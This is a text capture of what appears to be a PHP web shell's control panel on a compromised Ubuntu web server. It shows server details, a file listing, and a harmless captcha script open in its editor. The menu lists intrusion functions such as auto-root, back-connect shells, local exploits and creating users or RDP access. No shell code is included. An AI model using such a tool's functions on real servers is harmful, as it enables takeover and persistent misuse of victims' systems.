Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.222.182.226
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
cug_wait /
html_modules /
[ HOME SHELL ]
Name
Size
Permission
Action
captcha
[ DIR ]
drwxr-xr-x
captcha.html
599
B
-rwxr-xr-x
captcha.php
1.11
KB
-rwxr-xr-x
custom_upload_details.html
2.36
KB
-rwxr-xr-x
download_upload.html
2.34
KB
-rwxr-xr-x
setup_user_rights.html
2.73
KB
-rwxr-xr-x
setup_user_set_up.html
3.66
KB
-rwxr-xr-x
system_general_master_setup.ht...
5.25
KB
-rwxr-xr-x
system_general_master_setup.ph...
13.08
KB
-rwxr-xr-x
system_general_master_setup010...
11.87
KB
-rwxr-xr-x
system_general_master_setup_08...
12.52
KB
-rwxr-xr-x
system_general_master_setup_ol...
11.85
KB
-rwxr-xr-x
system_transcation_series.html
4.82
KB
-rwxr-xr-x
system_user_schema_elements.ht...
13.84
KB
-rwxr-xr-x
system_user_schema_group.html
7.61
KB
-rwxr-xr-x
upload_details.html
4.94
KB
-rwxr-xr-x
upload_group_details.html
1.8
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : captcha.php
<?PHP // Adapted for The Art of Web: www.the-art-of-web.com // Please acknowledge use of this code by including this header. // initialise image with dimensions of 120 x 30 pixels $image = @imagecreatetruecolor(120, 30) or die("Cannot Initialize new GD image stream"); // set background to white and allocate drawing colours $background = imagecolorallocate($image, 0xFF, 0xFF, 0xFF); imagefill($image, 0, 0, $background); $linecolor = imagecolorallocate($image, 0xCC, 0xCC, 0xCC); $textcolor = imagecolorallocate($image, 0x33, 0x33, 0x33); // draw random lines on canvas for($i=0; $i < 6; $i++) { imagesetthickness($image, rand(1,3)); imageline($image, 0, rand(0,30), 120, rand(0,30), $linecolor); } session_start(); // add random digits to canvas $digit = ''; for($x = 15; $x <= 95; $x += 20) { $digit .= ($num = rand(0, 9)); imagechar($image, rand(3, 5), $x, rand(2, 14), $num, $textcolor); } // record digits in session variable $_SESSION['digit'] = $digit; // display image and clean up header('Content-type: image/png'); imagepng($image); imagedestroy($image); ?>
Close